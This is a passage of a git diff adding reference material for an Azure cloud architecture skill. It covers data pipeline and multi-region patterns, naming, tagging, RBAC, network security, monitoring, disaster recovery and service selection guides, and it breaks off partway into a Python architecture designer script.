+    └────┬─────┘     └────┬─────┘
+         │                │
+         └────────┬───────┘
+                  │
+         ┌────────▼────────┐
+         │  Data Lake      │
+         │  Storage Gen2   │
+         │  (raw/curated)  │
+         └────────┬────────┘
+                  │
+         ┌────────▼────────┐
+         │  Synapse         │
+         │  Analytics       │
+         │  (SQL + Spark)   │
+         └────────┬────────┘
+                  │
+         ┌────────▼────────┐
+         │  Power BI       │
+         │  (dashboards)   │
+         └─────────────────┘
+```
+
+### Services
+
+| Service | Purpose | Configuration |
+|---------|---------|---------------|
+| Event Hubs | Real-time event ingestion | Standard, 2-8 partitions |
+| Data Factory | Batch ETL orchestration | Managed, 90+ connectors |
+| Data Lake Storage Gen2 | Raw and curated data lake | HNS enabled, lifecycle policies |
+| Synapse Analytics | SQL and Spark analytics | Serverless SQL pool (pay-per-query) |
+| Azure Functions | Lightweight processing | Triggered by Event Hubs or Blob |
+| Power BI | Business intelligence | Pro ($10/user/month) |
+
+### Data Lake Organization
+
+```
+data-lake/
+├── raw/                    # Landing zone — immutable source data
+│   ├── source-system-a/
+│   │   └── YYYY/MM/DD/     # Date-partitioned
+│   └── source-system-b/
+├── curated/                # Cleaned, validated, business-ready
+│   ├── dimension/
+│   └── fact/
+├── sandbox/                # Ad-hoc exploration
+└── archive/                # Cold storage (lifecycle policy target)
+```
+
+### Cost Estimate
+
+| Component | Dev | Production |
+|-----------|-----|-----------|
+| Event Hubs (1 TU) | $22 | $44-176 |
+| Data Factory | $0 (free tier) | $50-200 |
+| Data Lake Storage | $5 | $20-80 |
+| Synapse Serverless SQL | $5 | $50-300 |
+| Azure Functions | $0 | $5-20 |
+| Power BI Pro | $10/user | $10/user |
+| **Total** | **~$42** | **~$180-800** |
+
+---
+
+## Pattern 5: Multi-Region Active-Active
+
+### Architecture
+
+```
+                    ┌──────────────┐
+                    │  Azure Front │
+                    │  Door (Global│
+                    │  LB + WAF)   │
+                    └──┬────────┬──┘
+                       │        │
+            ┌──────────▼──┐ ┌──▼──────────┐
+            │  Region 1   │ │  Region 2   │
+            │  (East US)  │ │  (West EU)  │
+            │             │ │             │
+            │ App Service │ │ App Service │
+            │ + SQL       │ │ + SQL       │
+            │ + Redis     │ │ + Redis     │
+            └──────┬──────┘ └──────┬──────┘
+                   │               │
+            ┌──────▼───────────────▼──────┐
+            │      Cosmos DB              │
+            │  (multi-region writes)      │
+            │  Session consistency         │
+            └─────────────────────────────┘
+```
+
+### Multi-Region Design Decisions
+
+| Decision | Recommendation | Rationale |
+|----------|---------------|-----------|
+| Global load balancer | Front Door Premium | Built-in WAF, CDN, health probes, fastest failover |
+| Database replication | Cosmos DB multi-write or SQL failover groups | Cosmos for global writes, SQL for relational needs |
+| Session state | Azure Cache for Redis (per region) | Local sessions, avoid cross-region latency |
+| Static content | Front Door CDN | Edge-cached, no origin required |
+| DNS strategy | Front Door handles routing | No separate Traffic Manager needed |
+| Failover | Automatic (Front Door health probes) | 10-30 second detection, automatic reroute |
+
+### Azure SQL Failover Groups vs Cosmos DB Multi-Region
+
+| Feature | SQL Failover Groups | Cosmos DB Multi-Region |
+|---------|-------------------|----------------------|
+| Replication | Async (RPO ~5s) | Sync or async (configurable) |
+| Write region | Single primary | Multi-write capable |
+| Failover | Automatic or manual (60s grace) | Automatic |
+| Consistency | Strong (single writer) | 5 levels (session recommended) |
+| Cost | 2x compute (active-passive) | Per-region RU/s charge |
+| Best for | Relational data, transactions | Document data, global low-latency |
+
+### Cost Impact
+
+Multi-region typically costs 1.5-2x single region:
+- Compute: 2x (running in both regions)
+- Database: 1.5-2x (replication, multi-write)
+- Networking: Additional cross-region data transfer (~$0.02-0.05/GB)
+- Front Door Premium: ~$100-200/month
+
+---
+
+## Well-Architected Framework Alignment
+
+Every architecture pattern should address all five pillars of the Azure Well-Architected Framework.
+
+### Reliability
+
+- Deploy across Availability Zones (zone-redundant App Service, AKS, SQL)
+- Enable health probes at every layer
+- Implement retry policies with exponential backoff (Polly for .NET, tenacity for Python)
+- Define RPO/RTO and test disaster recovery quarterly
+- Use Azure Chaos Studio for fault injection testing
+
+### Security
+
+- Entra ID for all human and service authentication
+- Managed Identity for all Azure service-to-service communication
+- Key Vault for secrets, certificates, and encryption keys — no secrets in code or config
+- Private Endpoints for all PaaS services in production
+- Microsoft Defender for Cloud for threat detection and compliance
+
+### Cost Optimization
+
+- Use serverless and consumption-based services where possible
+- Auto-pause Azure SQL in dev/test (serverless tier)
+- Spot VMs for fault-tolerant AKS node pools
+- Reserved Instances for steady-state production workloads (1-year = 35% savings)
+- Azure Advisor cost recommendations — review weekly
+- Set budgets and alerts at subscription and resource group level
+
+### Operational Excellence
+
+- Bicep for all infrastructure (no manual portal deployments)
+- GitOps for AKS (Flux or ArgoCD)
+- Deployment slots or blue-green for zero-downtime deploys
+- Centralized logging in Log Analytics with standardized KQL queries
+- Azure DevOps or GitHub Actions for CI/CD with workload identity federation
+
+### Performance Efficiency
+
+- Application Insights for distributed tracing and performance profiling
+- Azure Cache for Redis for session state and hot-path caching
+- Front Door for edge caching and global acceleration
+- Autoscale rules on compute (CPU, memory, HTTP queue length)
+- Load testing with Azure Load Testing before production launch
--- a/engineering-team/azure-cloud-architect/references/best_practices.md
+++ b/engineering-team/azure-cloud-architect/references/best_practices.md
@@ -0,0 +1,337 @@
+# Azure Best Practices
+
+Production-ready practices for naming, tagging, security, networking, monitoring, and disaster recovery on Azure.
+
+---
+
+## Table of Contents
+
+- [Naming Conventions](#naming-conventions)
+- [Tagging Strategy](#tagging-strategy)
+- [RBAC and Least Privilege](#rbac-and-least-privilege)
+- [Network Security](#network-security)
+- [Monitoring and Alerting](#monitoring-and-alerting)
+- [Disaster Recovery](#disaster-recovery)
+- [Common Pitfalls](#common-pitfalls)
+
+---
+
+## Naming Conventions
+
+Follow the Azure Cloud Adoption Framework (CAF) naming convention for consistency and automation.
+
+### Format
+
+```
+<resource-type>-<workload>-<environment>-<region>-<instance>
+```
+
+### Examples
+
+| Resource | Naming Pattern | Example |
+|----------|---------------|---------|
+| Resource Group | rg-\<workload\>-\<env\> | rg-myapp-prod |
+| App Service | app-\<workload\>-\<env\> | app-myapp-prod |
+| App Service Plan | plan-\<workload\>-\<env\> | plan-myapp-prod |
+| Azure SQL Server | sql-\<workload\>-\<env\> | sql-myapp-prod |
+| Azure SQL Database | sqldb-\<workload\>-\<env\> | sqldb-myapp-prod |
+| Storage Account | st\<workload\>\<env\> (no hyphens) | stmyappprod |
+| Key Vault | kv-\<workload\>-\<env\> | kv-myapp-prod |
+| AKS Cluster | aks-\<workload\>-\<env\> | aks-myapp-prod |
+| Container Registry | cr\<workload\>\<env\> (no hyphens) | crmyappprod |
+| Virtual Network | vnet-\<workload\>-\<env\> | vnet-myapp-prod |
+| Subnet | snet-\<purpose\> | snet-app, snet-data |
+| NSG | nsg-\<subnet-name\> | nsg-snet-app |
+| Public IP | pip-\<resource\>-\<env\> | pip-agw-prod |
+| Cosmos DB | cosmos-\<workload\>-\<env\> | cosmos-myapp-prod |
+| Service Bus | sb-\<workload\>-\<env\> | sb-myapp-prod |
+| Event Hubs | evh-\<workload\>-\<env\> | evh-myapp-prod |
+| Log Analytics | log-\<workload\>-\<env\> | log-myapp-prod |
+| Application Insights | ai-\<workload\>-\<env\> | ai-myapp-prod |
+
+### Rules
+
+- Lowercase only (some resources require it — be consistent everywhere)
+- Hyphens as separators (except where disallowed: storage accounts, container registries)
+- No longer than the resource type max length (e.g., storage accounts max 24 characters)
+- Environment abbreviations: `dev`, `stg`, `prod`
+- Region abbreviations: `eus` (East US), `weu` (West Europe), `sea` (Southeast Asia)
+
+---
+
+## Tagging Strategy
+
+Tags enable cost allocation, ownership tracking, and automation. Apply to every resource.
+
+### Required Tags
+
+| Tag Key | Purpose | Example Values |
+|---------|---------|---------------|
+| environment | Cost splitting, policy targeting | dev, staging, production |
+| app-name | Workload identification | myapp, data-pipeline |
+| owner | Team or individual responsible | platform-team, jane.doe@company.com |
+| cost-center | Finance allocation | CC-1234, engineering |
+
+### Recommended Tags
+
+| Tag Key | Purpose | Example Values |
+|---------|---------|---------------|
+| created-by | IaC or manual tracking | bicep, terraform, portal |
+| data-classification | Security posture | public, internal, confidential |
+| compliance | Regulatory requirements | hipaa, gdpr, sox |
+| auto-shutdown | Dev/test cost savings | true, false |
+
+### Enforcement
+
+Use Azure Policy to enforce tagging:
+
+```json
+{
+  "if": {
+    "allOf": [
+      { "field": "tags['environment']", "exists": "false" },
+      { "field": "type", "notEquals": "Microsoft.Resources/subscriptions/resourceGroups" }
+    ]
+  },
+  "then": { "effect": "deny" }
+}
+```
+
+---
+
+## RBAC and Least Privilege
+
+### Principles
+
+1. **Use built-in roles** before creating custom roles
+2. **Assign roles to groups**, not individual users
+3. **Scope to the narrowest level** — resource group or resource, not subscription
+4. **Use Managed Identity** for service-to-service — never store credentials
+5. **Enable Entra ID PIM** (Privileged Identity Management) for just-in-time admin access
+
+### Common Role Assignments
+
+| Persona | Scope | Role |
+|---------|-------|------|
+| Developer | Resource Group (dev) | Contributor |
+| Developer | Resource Group (prod) | Reader |
+| CI/CD pipeline | Resource Group | Contributor (via workload identity) |
+| App Service | Key Vault | Key Vault Secrets User |
+| App Service | Azure SQL | SQL DB Contributor (or Entra auth) |
+| AKS pod | Cosmos DB | Cosmos DB Built-in Data Contributor |
+| Security team | Subscription | Security Reader |
+| Platform team | Subscription | Owner (with PIM) |
+
+### Workload Identity Federation
+
+For CI/CD pipelines (GitHub Actions, Azure DevOps), use workload identity federation instead of service principal secrets:
+
+```bash
+# Create federated credential (GitHub Actions example)
+az ad app federated-credential create \
+  --id <app-object-id> \
+  --parameters '{
+    "name": "github-main",
+    "issuer": "https://token.actions.githubusercontent.com",
+    "subject": "repo:org/repo:ref:refs/heads/main",
+    "audiences": ["api://AzureADTokenExchange"]
+  }'
+```
+
+---
+
+## Network Security
+
+### Defense in Depth
+
+| Layer | Control | Implementation |
+|-------|---------|---------------|
+| Edge | DDoS + WAF | Azure DDoS Protection + Front Door WAF |
+| Perimeter | Firewall | Azure Firewall or NVA for hub VNet |
+| Network | Segmentation | VNet + subnets + NSGs |
+| Application | Access control | Private Endpoints + Managed Identity |
+| Data | Encryption | TLS 1.2+ in transit, CMK at rest |
+
+### Private Endpoints
+
+Every PaaS service in production must use Private Endpoints:
+
+| Service | Private Endpoint Support | Private DNS Zone |
+|---------|------------------------|------------------|
+| Azure SQL | Yes | privatelink.database.windows.net |
+| Cosmos DB | Yes | privatelink.documents.azure.com |
+| Key Vault | Yes | privatelink.vaultcore.azure.net |
+| Storage (Blob) | Yes | privatelink.blob.core.windows.net |
+| Container Registry | Yes | privatelink.azurecr.io |
+| Service Bus | Yes | privatelink.servicebus.windows.net |
+| App Service | VNet Integration (outbound) + Private Endpoint (inbound) | privatelink.azurewebsites.net |
+
+### NSG Rules Baseline
+
+Every subnet should have an NSG. Start with deny-all inbound, then open only what is needed:
+
+```
+Priority  Direction  Action  Source          Destination     Port
+100       Inbound    Allow   Front Door      App Subnet      443
+200       Inbound    Allow   App Subnet      Data Subnet     1433,5432
+300       Inbound    Allow   VNet            VNet            Any (internal)
+4096      Inbound    Deny    Any             Any             Any
+```
+
+### Application Gateway + WAF
+
+For single-region web apps without Front Door:
+
+- Application Gateway v2 with WAF enabled
+- OWASP 3.2 rule set + custom rules
+- Rate limiting per client IP
+- Bot protection (managed rule set)
+- SSL termination with Key Vault certificate
+
+---
+
+## Monitoring and Alerting
+
+### Monitoring Stack
+
+```
+Application Insights (APM + distributed tracing)
+        │
+        ▼
+Log Analytics Workspace (central log store)
+        │
+        ▼
+Azure Monitor Alerts (metric + log-based)
+        │
+        ▼
+Action Groups (email, Teams, PagerDuty, webhook)
+```
+
+### Essential Alerts
+
+| Alert | Condition | Severity |
+|-------|-----------|----------|
+| App Service HTTP 5xx | > 10 in 5 minutes | Critical (Sev 1) |
+| App Service response time | P95 > 2 seconds | Warning (Sev 2) |
+| Azure SQL DTU/CPU | > 80% for 10 minutes | Warning (Sev 2) |
+| Azure SQL deadlocks | > 0 | Warning (Sev 2) |
+| Cosmos DB throttled requests | 429 count > 10 in 5 min | Warning (Sev 2) |
+| AKS node CPU | > 80% for 10 minutes | Warning (Sev 2) |
+| AKS pod restart count | > 5 in 10 minutes | Critical (Sev 1) |
+| Key Vault access denied | > 0 | Critical (Sev 1) |
+| Budget threshold | 80% of monthly budget | Warning (Sev 3) |
+| Budget threshold | 100% of monthly budget | Critical (Sev 1) |
+
+### KQL Queries for Troubleshooting
+
+**App Service slow requests:**
+```kql
+requests
+| where duration > 2000
+| summarize count(), avg(duration), percentile(duration, 95) by name
+| order by count_ desc
+| take 10
+```
+
+**Failed dependencies (SQL, HTTP, etc.):**
+```kql
+dependencies
+| where success == false
+| summarize count() by type, target, resultCode
+| order by count_ desc
+```
+
+**AKS pod errors:**
+```kql
+KubePodInventory
+| where PodStatus != "Running" and PodStatus != "Succeeded"
+| summarize count() by PodStatus, Namespace, Name
+| order by count_ desc
+```
+
+### Application Insights Configuration
+
+- Enable **distributed tracing** with W3C trace context
+- Set **sampling** to 5-10% for high-volume production (100% for dev)
+- Enable **profiler** for .NET applications
+- Enable **snapshot debugger** for exception analysis
+- Configure **availability tests** (URL ping every 5 minutes from multiple regions)
+
+---
+
+## Disaster Recovery
+
+### RPO/RTO Mapping
+
+| Tier | RPO | RTO | Strategy | Cost |
+|------|-----|-----|----------|------|
+| Tier 1 (critical) | < 5 minutes | < 1 hour | Active-active multi-region | 2x |
+| Tier 2 (important) | < 1 hour | < 4 hours | Warm standby | 1.3x |
+| Tier 3 (standard) | < 24 hours | < 24 hours | Backup and restore | 1.1x |
+| Tier 4 (non-critical) | < 72 hours | < 72 hours | Rebuild from IaC | 1x |
+
+### Backup Strategy
+
+| Service | Backup Method | Retention |
+|---------|--------------|-----------|
+| Azure SQL | Automated backups | 7 days (short-term), 10 years (long-term) |
+| Cosmos DB | Continuous backup + point-in-time restore | 7-30 days |
+| Blob Storage | Soft delete + versioning + geo-redundant | 30 days soft delete |
+| AKS | Velero backup to Blob Storage | 7 days |
+| Key Vault | Soft delete + purge protection | 90 days |
+| App Service | Manual or automated (Backup and Restore feature) | Custom |
+
+### Storage Redundancy
+
+| Redundancy | Regions | Durability | Use Case |
+|-----------|---------|-----------|----------|
+| LRS | 1 (3 copies) | 11 nines | Dev/test, easily recreatable data |
+| ZRS | 1 (3 AZs) | 12 nines | Production, zone failure protection |
+| GRS | 2 (6 copies) | 16 nines | Business-critical, regional failure protection |
+| GZRS | 2 (3 AZs + secondary) | 16 nines | Most critical data, best protection |
+
+**Default to ZRS for production.** Use GRS/GZRS only when cross-region DR is required.
+
+### DR Testing Checklist
+
+- [ ] Verify automated backups are running and retention is correct
+- [ ] Test point-in-time restore for databases (monthly)
+- [ ] Test regional failover for SQL failover groups (quarterly)
+- [ ] Validate IaC can recreate full environment from scratch
+- [ ] Test Front Door failover by taking down primary region health endpoint
+- [ ] Document and test runbook for manual failover steps
+- [ ] Measure actual RTO vs target during DR drill
+
+---
+
+## Common Pitfalls
+
+### Cost Pitfalls
+
+| Pitfall | Impact | Prevention |
+|---------|--------|-----------|
+| No budget alerts | Unexpected bills | Set alerts at 50%, 80%, 100% on day one |
+| Premium tier in dev/test | 3-5x overspend | Use Basic/Free tiers, auto-shutdown VMs |
+| Orphaned resources | Silent monthly charges | Tag everything, review Cost Management weekly |
+| Ignoring Reserved Instances | 35-55% overpay on steady workloads | Review Azure Advisor quarterly |
+| Over-provisioned Cosmos DB RU/s | Paying for unused throughput | Use autoscale or serverless |
+
+### Security Pitfalls
+
+| Pitfall | Impact | Prevention |
+|---------|--------|-----------|
+| Secrets in App Settings | Leaked credentials | Use Key Vault references |
+| Public PaaS endpoints | Exposed attack surface | Private Endpoints + VNet integration |
+| Contributor role on subscription | Overprivileged access | Scope to resource group, use PIM |
+| No diagnostic settings | Blind to attacks | Enable on every resource from day one |
+| SQL password authentication | Weak identity model | Entra-only auth, Managed Identity |
+
+### Operational Pitfalls
+
+| Pitfall | Impact | Prevention |
+|---------|--------|-----------|
+| Manual portal deployments | Drift, no audit trail | Bicep for everything, block portal changes via Policy |
+| No health checks configured | Silent failures | /health endpoint, Front Door probes, App Service checks |
+| Single region deployment | Single point of failure | At minimum, use Availability Zones |
+| No tagging strategy | Cannot track costs/ownership | Enforce via Azure Policy from day one |
+| Ignoring Azure Advisor | Missed optimizations | Weekly review, enable email digest |
--- a/engineering-team/azure-cloud-architect/references/service_selection.md
+++ b/engineering-team/azure-cloud-architect/references/service_selection.md
@@ -0,0 +1,250 @@
+# Azure Service Selection Guide
+
+Quick reference for choosing the right Azure service based on workload requirements.
+
+---
+
+## Table of Contents
+
+- [Compute Services](#compute-services)
+- [Database Services](#database-services)
+- [Storage Services](#storage-services)
+- [Messaging and Events](#messaging-and-events)
+- [Networking](#networking)
+- [Security and Identity](#security-and-identity)
+- [Monitoring and Observability](#monitoring-and-observability)
+
+---
+
+## Compute Services
+
+### Decision Matrix
+
+| Requirement | Recommended Service |
+|-------------|---------------------|
+| Event-driven, short tasks (<10 min) | Azure Functions (Consumption) |
+| Event-driven, longer tasks (<30 min) | Azure Functions (Premium) |
+| Containerized apps, simple deployment | Azure Container Apps |
+| Full Kubernetes control | AKS |
+| Traditional web apps (PaaS) | App Service |
+| GPU, HPC, custom OS | Virtual Machines |
+| Batch processing | Azure Batch |
+| Simple container from source | App Service (container) |
+
+### Azure Functions vs Container Apps vs AKS vs App Service
+
+| Feature | Functions | Container Apps | AKS | App Service |
+|---------|-----------|---------------|-----|-------------|
+| Scale to zero | Yes (Consumption) | Yes | No (min 1 node) | No |
+| Kubernetes | No | Built on K8s (abstracted) | Full K8s | No |
+| Cold start | 1-5s (Consumption) | 0-2s | N/A | N/A |
+| Max execution time | 10 min (Consumption), 30 min (Premium) | Unlimited | Unlimited | Unlimited |
+| Languages | C#, JS, Python, Java, Go, Rust, PowerShell | Any container | Any container | .NET, Node, Python, Java, PHP, Ruby |
+| Pricing model | Per-execution | Per vCPU-second | Per node | Per plan |
+| Best for | Event handlers, APIs, scheduled jobs | Microservices, APIs | Complex platforms, multi-team | Web apps, APIs, mobile backends |
+| Operational complexity | Low | Low-Medium | High | Low |
+| Dapr integration | No | Built-in | Manual | No |
+| KEDA autoscaling | No | Built-in | Manual install | No |
+
+**Opinionated recommendation:**
+- **Start with App Service** for web apps and APIs — simplest operational model.
+- **Use Container Apps** for microservices — serverless containers without Kubernetes complexity.
+- **Use AKS** only when you need full Kubernetes API access (custom operators, service mesh, multi-cluster).
+- **Use Functions** for event-driven glue (queue processing, webhooks, scheduled jobs).
+
+### VM Size Selection
+
+| Workload | Series | Example | vCPUs | RAM | Use Case |
+|----------|--------|---------|-------|-----|----------|
+| General purpose | Dv5/Dsv5 | Standard_D4s_v5 | 4 | 16 GB | Web servers, small databases |
+| Memory optimized | Ev5/Esv5 | Standard_E8s_v5 | 8 | 64 GB | Databases, caching, analytics |
+| Compute optimized | Fv2/Fsv2 | Standard_F8s_v2 | 8 | 16 GB | Batch processing, ML inference |
+| Storage optimized | Lsv3 | Standard_L8s_v3 | 8 | 64 GB | Data warehouses, large databases |
+| GPU | NCv3/NDv4 | Standard_NC6s_v3 | 6 | 112 GB | ML training, rendering |
+
+**Always use v5 generation or newer** — better price-performance than older series.
+
+---
+
+## Database Services
+
+### Decision Matrix
+
+| Requirement | Recommended Service |
+|-------------|---------------------|
+| Relational, SQL Server compatible | Azure SQL Database |
+| Relational, PostgreSQL | Azure Database for PostgreSQL Flexible Server |
+| Relational, MySQL | Azure Database for MySQL Flexible Server |
+| Document / multi-model, global distribution | Cosmos DB |
+| Key-value cache, sessions | Azure Cache for Redis |
+| Time-series, IoT data | Azure Data Explorer (Kusto) |
+| Full-text search | Azure AI Search (formerly Cognitive Search) |
+| Graph database | Cosmos DB (Gremlin API) |
+
+### Cosmos DB vs Azure SQL vs PostgreSQL
+
+| Feature | Cosmos DB | Azure SQL | PostgreSQL Flexible |
+|---------|-----------|-----------|-------------------|
+| Data model | Document, key-value, graph, table, column | Relational | Relational + JSON |
+| Global distribution | Native multi-region writes | Geo-replication (async) | Read replicas |
+| Consistency | 5 levels (strong to eventual) | Strong | Strong |
+| Scaling | RU/s (auto or manual) | DTU or vCore | vCore |
+| Serverless tier | Yes | Yes | No |
+| Best for | Global apps, variable schema, low-latency reads | OLTP, complex queries, transactions | PostgreSQL ecosystem, extensions |
+| Pricing model | Per RU/s + storage | Per DTU or per vCore | Per vCore |
+| Managed backups | Continuous + point-in-time | Automatic + long-term retention | Automatic |
+
+**Opinionated recommendation:**
+- **Default to Azure SQL Serverless** for most relational workloads — auto-pause saves money in dev/staging.
+- **Use PostgreSQL Flexible** when you need PostGIS, full-text search, or specific PostgreSQL extensions.
+- **Use Cosmos DB** only when you need global distribution, sub-10ms latency, or flexible schema.
+- **Never use Cosmos DB** for workloads that need complex joins or transactions across partitions.
+
+### Azure SQL Tier Selection
+
+| Tier | Use Case | Compute | Cost Range |
+|------|----------|---------|------------|
+| Basic / S0 | Dev/test, tiny workloads | 5 DTUs | $5/month |
+| General Purpose (Serverless) | Variable workloads, dev/staging | 0.5-40 vCores (auto-pause) | $40-800/month |
+| General Purpose (Provisioned) | Steady production workloads | 2-80 vCores | $150-3000/month |
+| Business Critical | High IOPS, low latency, readable secondary | 2-128 vCores | $400-8000/month |
+| Hyperscale | Large databases (>4 TB), instant scaling | 2-128 vCores | $200-5000/month |
+
+---
+
+## Storage Services
+
+### Decision Matrix
+
+| Requirement | Recommended Service |
+|-------------|---------------------|
+| Unstructured data (files, images, backups) | Blob Storage |
+| File shares (SMB/NFS) | Azure Files |
+| High-performance file shares | Azure NetApp Files |
+| Data Lake (analytics, big data) | Data Lake Storage Gen2 |
+| Disk storage for VMs | Managed Disks |
+| Queue-based messaging (simple) | Queue Storage |
+| Table data (simple key-value) | Table Storage (or Cosmos DB Table API) |
+
+### Blob Storage Tiers
+
+| Tier | Access Pattern | Cost (per GB/month) | Access Cost | Use Case |
+|------|---------------|---------------------|-------------|----------|
+| Hot | Frequent access | $0.018 | Low | Active data, web content |
+| Cool | Infrequent (30+ days) | $0.01 | Medium | Backups, older data |
+| Cold | Rarely accessed (90+ days) | $0.0036 | Higher | Compliance archives |
+| Archive | Almost never (180+ days) | $0.00099 | High (rehydrate required) | Long-term retention |
+
+**Always set lifecycle management policies.** Rule of thumb: Hot for 30 days, Cool for 90 days, Cold or Archive after that.
+
+---
+
+## Messaging and Events
+
+### Decision Matrix
+
+| Requirement | Recommended Service |
+|-------------|---------------------|
+| Pub/sub, event routing, reactive | Event Grid |
+| Reliable message queues, transactions | Service Bus |
+| High-throughput event streaming | Event Hubs |
+| Simple task queues | Queue Storage |
+| IoT device telemetry | IoT Hub |
+
+### Event Grid vs Service Bus vs Event Hubs
+
+| Feature | Event Grid | Service Bus | Event Hubs |
+|---------|-----------|-------------|------------|
+| Pattern | Pub/Sub events | Message queue / topic | Event streaming |
+| Delivery | At-least-once | At-least-once (peek-lock) | At-least-once (partitioned) |
+| Ordering | No guarantee | FIFO (sessions) | Per partition |
+| Max message size | 1 MB | 256 KB (Standard), 100 MB (Premium) | 1 MB (Standard), 20 MB (Premium) |
+| Retention | 24 hours | 14 days (Standard) | 1-90 days |
+| Throughput | Millions/sec | Thousands/sec | Millions/sec |
+| Best for | Reactive events, webhooks | Business workflows, commands | Telemetry, logs, analytics |
+| Dead letter | Yes | Yes | Via capture to storage |
+
+**Opinionated recommendation:**
+- **Event Grid** for reactive, fan-out scenarios (blob uploaded, resource created, custom events).
+- **Service Bus** for reliable business messaging (orders, payments, workflows). Use topics for pub/sub, queues for point-to-point.
+- **Event Hubs** for high-volume telemetry, log aggregation, and streaming analytics.
+
+---
+
+## Networking
+
+### Decision Matrix
+
+| Requirement | Recommended Service |
+|-------------|---------------------|
+| Global HTTP load balancing + CDN + WAF | Azure Front Door |
+| Regional Layer 7 load balancing + WAF | Application Gateway |
+| Regional Layer 4 load balancing | Azure Load Balancer |
+| DNS management | Azure DNS |
+| DNS-based global traffic routing | Traffic Manager |
+| Private connectivity to PaaS | Private Endpoints |
+| Site-to-site VPN | VPN Gateway |
+| Dedicated private connection | ExpressRoute |
+| Outbound internet from VNet | NAT Gateway |
+| DDoS protection | Azure DDoS Protection |
+
+### Front Door vs Application Gateway vs Load Balancer
+
+| Feature | Front Door | Application Gateway | Load Balancer |
+|---------|-----------|-------------------|--------------|
+| Layer | 7 (HTTP/HTTPS) | 7 (HTTP/HTTPS) | 4 (TCP/UDP) |
+| Scope | Global | Regional | Regional |
+| WAF | Yes (Premium) | Yes (v2) | No |
+| SSL termination | Yes | Yes | No |
+| CDN | Built-in | No | No |
+| Health probes | Yes | Yes | Yes |
+| Best for | Global web apps, multi-region | Single-region web apps | TCP/UDP workloads, internal LB |
+
+---
+
+## Security and Identity
+
+### Decision Matrix
+
+| Requirement | Recommended Service |
+|-------------|---------------------|
+| User authentication | Entra ID (Azure AD) |
+| B2C customer identity | Entra External ID (Azure AD B2C) |
+| Secrets, keys, certificates | Key Vault |
+| Service-to-service auth | Managed Identity |
+| Network access control | NSGs + Private Endpoints |
+| Web application firewall | Front Door WAF or App Gateway WAF |
+| Threat detection | Microsoft Defender for Cloud |
+| Policy enforcement | Azure Policy |
+| Privileged access management | Entra ID PIM |
+
+### Managed Identity Usage
+
+| Scenario | Configuration |
+|----------|---------------|
+| App Service accessing SQL | System-assigned MI + Azure SQL Entra auth |
+| Functions accessing Key Vault | System-assigned MI + Key Vault RBAC |
+| AKS pods accessing Cosmos DB | Workload Identity + Cosmos DB RBAC |
+| VM accessing Storage | System-assigned MI + Storage RBAC |
+| DevOps pipeline deploying | Workload Identity Federation (no secrets) |
+
+**Rule: Every Azure service that supports Managed Identity should use it.** No connection strings with passwords, no service principal secrets in config.
+
+---
+
+## Monitoring and Observability
+
+### Decision Matrix
+
+| Requirement | Recommended Service |
+|-------------|---------------------|
+| Application performance monitoring | Application Insights |
+| Log aggregation and queries | Log Analytics (KQL) |
+| Metrics and alerts | Azure Monitor |
+| Dashboards | Azure Dashboard or Grafana (managed) |
+| Distributed tracing | Application Insights (OpenTelemetry) |
+| Cost monitoring | Cost Management + Budgets |
+| Security monitoring | Microsoft Defender for Cloud |
+| Compliance monitoring | Azure Policy + Regulatory Compliance |
+
+**Every resource should have diagnostic settings** sending logs and metrics to a Log Analytics workspace. Non-negotiable for production.
--- a/engineering-team/azure-cloud-architect/scripts/architecture_designer.py
+++ b/engineering-team/azure-cloud-architect/scripts/architecture_designer.py
@@ -0,0 +1,592 @@
+#!/usr/bin/env python3
+"""
+Azure architecture design and service recommendation tool.
+Generates architecture patterns based on application requirements.
+
+Usage:
+    python architecture_designer.py --app-type web_app --users 10000
+    python architecture_designer.py --app-type microservices --users 50000 --requirements '{"compliance": ["HIPAA"]}'
+    python architecture_designer.py --app-type serverless --users 5000 --json
+"""
+
+import argparse
+import json
+import sys
+from typing import Dict, List, Any
+
+
+# ---------------------------------------------------------------------------
+# Azure service catalog used by the designer
+# ---------------------------------------------------------------------------
+
+ARCHITECTURE_PATTERNS = {
+    "web_app": {
+        "small": "app_service_web",
+        "medium": "app_service_scaled",
+        "large": "multi_region_web",
+    },
+    "saas_platform": {
+        "small": "app_service_web",
+        "medium": "aks_microservices",
+        "large": "multi_region_web",
+    },
+    "mobile_backend": {
+        "small": "serverless_functions",
+        "medium": "app_service_web",
+        "large": "aks_microservices",
+    },
+    "microservices": {
+        "small": "container_apps",
+        "medium": "aks_microservices",
+        "large": "aks_microservices",
+    },
+    "data_pipeline": {
+        "small": "serverless_data",
+        "medium": "synapse_pipeline",
+        "large": "synapse_pipeline",
+    },
+    "serverless": {
+        "small": "serverless_functions",
+        "medium": "serverless_functions",
+        "large": "serverless_functions",
+    },
+}
+
+
+def _size_bucket(users: int) -> str:
+    if users < 10000:
+        return "small"
+    if users < 100000:
+        return "medium"
+    return "large"
+
+
+# ---------------------------------------------------------------------------
+# Pattern builders
+# ---------------------------------------------------------------------------
+
+def _app_service_web(users: int, reqs: Dict) -> Dict[str, Any]:
+    budget = reqs.get("budget_monthly_usd", 500)
+    return {
+        "recommended_pattern": "app_service_web",
+        "description": "Azure App Service with managed SQL and CDN",
+        "use_case": "Web apps, SaaS platforms, startup MVPs",
+        "service_stack": [
+            "App Service (Linux P1v3)",
+            "Azure SQL Database (Serverless GP_S_Gen5_2)",
+            "Azure Front Door",
+            "Azure Blob Storage",
+            "Key Vault",
+            "Entra ID + RBAC",
+            "Application Insights",
+        ],
+        "estimated_monthly_cost_usd": min(280, budget),
+        "cost_breakdown": {
+            "App Service P1v3": "$70-95",
+            "Azure SQL Serverless": "$40-120",
+            "Front Door": "$35-55",
+            "Blob Storage": "$5-15",
+            "Key Vault": "$1-5",
+            "Application Insights": "$5-20",
+        },
+        "pros": [
+            "Managed platform — no OS patching",
+            "Built-in autoscale and deployment slots",
+            "Easy CI/CD with GitHub Actions or Azure DevOps",
+            "Custom domains and TLS certificates included",
+            "Integrated authentication (Easy Auth)",
+        ],
+        "cons": [
+            "Less control than VMs or containers",
+            "Platform constraints for exotic runtimes",
+            "Cold start on lower-tier plans",
+            "Outbound IP shared unless isolated tier",
+        ],
+        "scaling": {
+            "users_supported": "1k - 100k",
+            "requests_per_second": "100 - 10,000",
+            "method": "App Service autoscale rules (CPU, memory, HTTP queue)",
+        },
+    }
+
+
+def _aks_microservices(users: int, reqs: Dict) -> Dict[str, Any]:
+    budget = reqs.get("budget_monthly_usd", 2000)
+    return {
+        "recommended_pattern": "aks_microservices",
+        "description": "Microservices on AKS with API Management and Cosmos DB",
